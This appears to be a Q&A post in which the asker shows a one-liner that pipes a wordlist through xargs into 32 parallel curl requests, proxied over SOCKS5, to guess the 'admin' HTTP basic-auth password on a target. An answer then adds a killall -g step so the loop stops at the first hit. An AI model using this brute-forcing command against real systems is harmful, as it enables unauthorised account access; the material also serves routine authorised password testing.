# using xargs in parallel bruteforce script

Tags: parallel-processing, xargs

I am working on a bruteforce script using xargs in parallel. I have it working using GNU parallel but cant get it to work right with xargs. So far I have

```
cat $wordlist | xargs -n 1 -P 32 -I {} curl -s -o /dev/null -w '%{http_code} {}\n' --socks5 127.0.0.1:1080 $ip -u admin:{} | awk '{if($1== "200") {print "Found password" $2; exit}}'
```

which prints the password but fails to exit. So my question is how can I write this so that it exits after finding first match?

Thanks.

Comment: You do not write why you do not simply use GNU Parallel. Is the reason covered on https://oletange.wordpress.com/2018/03/28/excuses-for-not-installing-gnu-parallel/

Comment: I was just trying to figure out a way to accomplish same thing with xargs. I have no problem using parallel.

Answer (score 0):

> So my question is how can I write this so that it exits after finding
> first match?

Don't use exit, that will likely give you SIGPIPE (signal 13) errors. Kill your process group safely this way:

```
{print "Found password" $2; killall -g}}
```